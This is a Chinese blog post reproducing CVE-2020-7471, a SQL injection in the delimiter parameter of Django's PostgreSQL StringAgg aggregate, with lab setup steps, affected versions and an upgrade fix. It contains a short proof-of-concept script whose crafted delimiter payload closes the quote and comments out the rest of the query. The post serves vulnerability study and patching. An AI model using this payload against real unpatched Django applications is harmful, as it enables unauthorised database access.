<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.cat.net/css?family=Lato:300,300italic,400,400italic,700,700italic|Fira Code:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"swanq.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x01 前言Django作为开放源码的Web应用python框架，作为最有代表性的web框架，构建了多种网站和APP。Django负责处理网站开发中麻烦的部分，因此让开发者专注于应用程序的编写。其采用了MVT的软件设计模式，即模型（Model），视图（View）和模板（Template），注重组件的重用性和“可插拔性”。原理通过构造分隔符，传递给聚合函数contrib.postgres.aggr">
<meta property="og:type" content="article">
<meta property="og:title" content="Django-sql注入漏洞复现-CVE-2020-7471">
<meta property="og:url" content="http://swanq.top/2021/03/29/Django-sql/index.html">
<meta property="og:site_name" content="SwanQ&#39;s blog">
<meta property="og:description" content="0x01 前言Django作为开放源码的Web应用python框架，作为最有代表性的web框架，构建了多种网站和APP。Django负责处理网站开发中麻烦的部分，因此让开发者专注于应用程序的编写。其采用了MVT的软件设计模式，即模型（Model），视图（View）和模板（Template），注重组件的重用性和“可插拔性”。原理通过构造分隔符，传递给聚合函数contrib.postgres.aggr">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/12.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/10.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/11.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/14.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/4.png">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/5.png">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/5.png">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/1.png">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/2.png">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/3.png">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/4.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/5.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/6.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/7.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/8.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/29/Django-sql/9.jpg">
<meta property="article:published_time" content="2021-03-29T11:53:21.000Z">
<meta property="article:modified_time" content="2021-04-07T01:30:12.931Z">
<meta property="article:author" content="swanQ">
<meta property="article:tag" content="漏洞复现">
<meta property="article:tag" content="sql注入">
<meta property="article:tag" content="Django">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://swanq.top/2021/03/29/Django-sql/12.jpg">

<link rel="canonical" href="http://swanq.top/2021/03/29/Django-sql/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Django-sql注入漏洞复现-CVE-2020-7471 | SwanQ's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SwanQ's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">有趣的是有道理且新奇，胡思乱想并不有趣。</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">16</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">3</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">8</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

  <a href="https://github.com/swanQs" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://swanq.top/2021/03/29/Django-sql/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="swanQ">
      <meta itemprop="description" content="Try & Enjoy">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SwanQ's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Django-sql注入漏洞复现-CVE-2020-7471
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-03-29 19:53:21" itemprop="dateCreated datePublished" datetime="2021-03-29T19:53:21+08:00">2021-03-29</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-04-07 09:30:12" itemprop="dateModified" datetime="2021-04-07T09:30:12+08:00">2021-04-07</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h2><p>Django作为开放源码的Web应用python框架，作为最有代表性的web框架，构建了多种网站和APP。Django负责处理网站开发中麻烦的部分，因此让开发者专注于应用程序的编写。其采用了MVT的软件设计模式，即模型（Model），视图（View）和模板（Template），注重组件的重用性和“可插拔性”。<br><strong>原理</strong><br>通过构造分隔符，传递给聚合函数contrib.postgres.aggregates.StringAgg，从而绕过转义符号（\）来注入恶意SQL语句。<br>漏洞的核心是StringAgg(delimiter),StringAgg聚合函数的delimiter参数存在SQL注入漏洞。</p>
<p>介绍下StringAgg，它会将输入的值使用 delimiter 分隔符级联起来。比如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Info.objects.all().values(&#39;gender&#39;).annotate(mydefinedname&#x3D;StringAgg(&#39;name&#39;, delimiter&#x3D;&quot;-&quot;))</span><br></pre></td></tr></table></figure>

<p>这个查询操作就是查询 Info 对应的 postgres 数据表的 gender 列，将gender相同的 name 列使用横线连接聚合，输入如下：</p>
<p><img src="/2021/03/29/Django-sql/12.jpg"></p>
<p>漏洞位于django/django/contrib/postgres/aggregates/general.py</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">from django.contrib.postgres.aggregates import StringAgg</span><br></pre></td></tr></table></figure>

<p>可以看到官方使用Value函数来防止注入，Value函数的内容如下</p>
<p><img src="/2021/03/29/Django-sql/10.jpg"></p>
<p><img src="/2021/03/29/Django-sql/11.jpg"></p>
<p>Value参数会被添加到sql参数列表，然后被Django内置的过滤机制过滤，来防注。</p>
<p>如何导致SQL 注入：<a target="_blank" rel="noopener" href="https://github.com/django/django/tree/6b178a3e930f72069f3cda2e6a09d1b320fc09ec">django</a>/<a target="_blank" rel="noopener" href="https://github.com/django/django/tree/6b178a3e930f72069f3cda2e6a09d1b320fc09ec/django">django</a>/<a target="_blank" rel="noopener" href="https://github.com/django/django/tree/6b178a3e930f72069f3cda2e6a09d1b320fc09ec/django/contrib">contrib</a>/<a target="_blank" rel="noopener" href="https://github.com/django/django/tree/6b178a3e930f72069f3cda2e6a09d1b320fc09ec/django/contrib/postgres">postgres</a>/<a target="_blank" rel="noopener" href="https://github.com/django/django/tree/6b178a3e930f72069f3cda2e6a09d1b320fc09ec/django/contrib/postgres/aggregates">aggregates</a>/general.py</p>
<p><img src="/2021/03/29/Django-sql/14.jpg"></p>
<p>delimiter没有任何过滤，我们可以通过闭合单引号来利用注入</p>
<p><img src="/2021/03/29/Django-sql/4.png"></p>
<p>(此图摘自先知社区)</p>
<p>测试发现，当delimiter为单引号时，会报错。可以看出单引号未经过任何转义嵌入到了 SQL 语句中，然后需要追踪内部程序找出完整的 SQL 语句上下文。从上面的图中可以看出来，查询语句调用了self.cursor.execute，sql变量还没嵌入时，delimiter 的值如下：</p>
<p><img src="/2021/03/29/Django-sql/5.png"></p>
<p>（此图摘自先知社区）</p>
<p><img src="/2021/03/29/Django-sql/5.png"></p>
<p>运行后看到此时sql已加入delimiter为单引号的取值。因为此处sql为字符串，所以需要转义。若是postgres则会执行以下内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT &quot;vul_app_info&quot;.&quot;gender&quot;, STRING_AGG(&quot;vul_app_info&quot;.&quot;name&quot;, &#39;&#39;&#39;) AS &quot;mydefinedname&quot; FROM &quot;vul_app_info&quot; GROUP BY &quot;vul_app_info&quot;.&quot;gender&quot; LIMIT 1 OFFSET 1</span><br></pre></td></tr></table></figure>

<p>此时三个单引号会导致语法错误，postgres的注释符为’)–。将delimiter设置为<code>&#39;)--</code>，可以成功注释from语句</p>
<p>为构造合法的上下文，将 delimiter设置为</p>
<p>**’-&#39;) AS “mydefinedname” FROM “vul_app_info” GROUP BY “vul_app_info”.”gender” LIMIT 1 OFFSET 1 – ‘  **</p>
<p>输出为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#39;gender&#39;: &#39;male&#39;, &#39;mydefinedname&#39;: &#39;li-zhao&#39;&#125;</span><br></pre></td></tr></table></figure>

<p>若设置delimiter为<code>-</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">delimiter&#x3D;&quot;-&quot;</span><br></pre></td></tr></table></figure>

<p>该语句使用StringAgg类，用于将输入的值使用delimiter分隔符级联。原本的语句中，查询info对应的gender列，并使用-来连接。就可以<strong>通过修改delimiter的内容来实现注入</strong>。</p>
<p>输出为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#39;gender&#39;: &#39;female&#39;, &#39;mydefinedname&#39;: &#39;zhang&#39;&#125;</span><br><span class="line">&#123;&#39;gender&#39;: &#39;male&#39;, &#39;mydefinedname&#39;: &#39;li-zhao&#39;&#125;</span><br></pre></td></tr></table></figure>

<p>POC如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">payload &#x3D; &#39;-&#39;</span><br><span class="line">   results &#x3D; Info.objects.all().values(&#39;gender&#39;).annotate(mydefinedname&#x3D;StringAgg(&#39;name&#39;, delimiter&#x3D;payload))</span><br><span class="line">   for e in results:</span><br><span class="line">       print(e)</span><br><span class="line">   print(&quot;[+]注入后的的输出：&quot;)</span><br><span class="line">   payload &#x3D; &#39;-\&#39;) AS &quot;mydefinedname&quot; FROM &quot;vul_app_info&quot; GROUP BY &quot;vul_app_info&quot;.&quot;gender&quot; LIMIT 1 OFFSET 1 -- &#39;</span><br><span class="line">   results &#x3D; Info.objects.all().values(&#39;gender&#39;).annotate(mydefinedname&#x3D;StringAgg(&#39;name&#39;, delimiter&#x3D;payload))</span><br><span class="line">   for e in results:</span><br><span class="line">       print(e)</span><br></pre></td></tr></table></figure>



<h2 id="0x02-漏洞复现"><a href="#0x02-漏洞复现" class="headerlink" title="0x02 漏洞复现"></a>0x02 漏洞复现</h2><ul>
<li>影响版本<br>Django 1.11.x &lt; 1.11.28<br>Django 2.2.x &lt; 2.2.10<br>Django 3.0.x &lt; 3.0.3<br>Django 主开发分支<br>其中Django 1.11.28、Django 2.2.10、Django 3.0.3不受影响。</li>
<li>测试环境<br>kalil<br>Django 3.0.2<h2 id="0x03-环境搭建"><a href="#0x03-环境搭建" class="headerlink" title="0x03 环境搭建"></a>0x03 环境搭建</h2>pip install django==3.0.2<br>安装postgres数据库，创建数据库test,并修改数据库密码<br><img src="/2021/03/29/Django-sql/1.png"><h2 id="0x04-漏洞复现"><a href="#0x04-漏洞复现" class="headerlink" title="0x04 漏洞复现"></a>0x04 漏洞复现</h2></li>
</ul>
<ol>
<li>由于刚才更改了数据库密码，于是更改配置文件的数据库名称以及密码<br>进入CVE-2020-7471/sqlvul_projects/settings.py，修改数据库配置，如果之前安装postgres数据库使用的默认配置（包括密码），这里就不需修改任何任何配置.<br>此处只需修改password为刚才设置密码。<br><img src="/2021/03/29/Django-sql/2.png"><br><img src="/2021/03/29/Django-sql/3.png"></li>
<li>再利用CVE-2020-7471/manage.py初始化测试数据库test数据库中的表<br><img src="/2021/03/29/Django-sql/4.jpg"><br>初始化环境完成。</li>
<li>进入test数据库查看表<br>进入数据库<br>\c test<br>查看全部表<br>\d<br><img src="/2021/03/29/Django-sql/5.jpg"><br>查看表vul_app_info的信息<br>select * from vul_app_info;<br><img src="/2021/03/29/Django-sql/6.jpg"><br>可以看到此刻表为空</li>
<li>执行POC向数据库写入数据<br><img src="/2021/03/29/Django-sql/7.jpg"><br>若执行成功POC中将插入三条数据<br>利用CVE-2020-7471/CVE-2020-7471.py写入数据<br><img src="/2021/03/29/Django-sql/8.jpg"><br><img src="/2021/03/29/Django-sql/9.jpg"><br>写入成功。<h2 id="0x05-漏洞修复"><a href="#0x05-漏洞修复" class="headerlink" title="0x05 漏洞修复"></a>0x05 漏洞修复</h2>升级到Django最新版3.0.3<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3></li>
</ol>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/Saferman/CVE-2020-7471">https://github.com/Saferman/CVE-2020-7471</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/255947.html">https://www.freebuf.com/vuls/255947.html</a></li>
<li><a target="_blank" rel="noopener" href="https://ryu22e.org/en/posts/2020/02/06/django-cve-2020-7471/">https://ryu22e.org/en/posts/2020/02/06/django-cve-2020-7471/</a></li>
</ul>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>swanQ
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://swanq.top/2021/03/29/Django-sql/" title="Django-sql注入漏洞复现-CVE-2020-7471">http://swanq.top/2021/03/29/Django-sql/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

	  <div>
      
       <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">你想在文章末尾对读者说的话</div>
    
</div>
      
      </div>
      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag"># 漏洞复现</a>
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
              <a href="/tags/Django/" rel="tag"># Django</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/28/domain/" rel="prev" title="域渗透">
      <i class="fa fa-chevron-left"></i> 域渗透
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/04/01/msf/" rel="next" title="metasploit(MSF)初始化及常用命令">
      metasploit(MSF)初始化及常用命令 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">0x01 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">2.</span> <span class="nav-text">0x02 漏洞复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">3.</span> <span class="nav-text">0x03 环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">4.</span> <span class="nav-text">0x04 漏洞复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="nav-number">5.</span> <span class="nav-text">0x05 漏洞修复</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">5.1.</span> <span class="nav-text">参考</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="swanQ"
      src="/images/author.jpg">
  <p class="site-author-name" itemprop="name">swanQ</p>
  <div class="site-description" itemprop="description">Try & Enjoy</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="sidebar-button motion-element"><i class="fa fa-comment"></i>
    聊天
  </a>
  </div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/swanQs" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;swanQs" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:zhuoma.swanq@foxmail.com" title="E-Mail → mailto:zhuoma.swanq@foxmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">swanQ</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
<script type="text/javascript" src="/js/src/clicklove.js"></script>
</html>
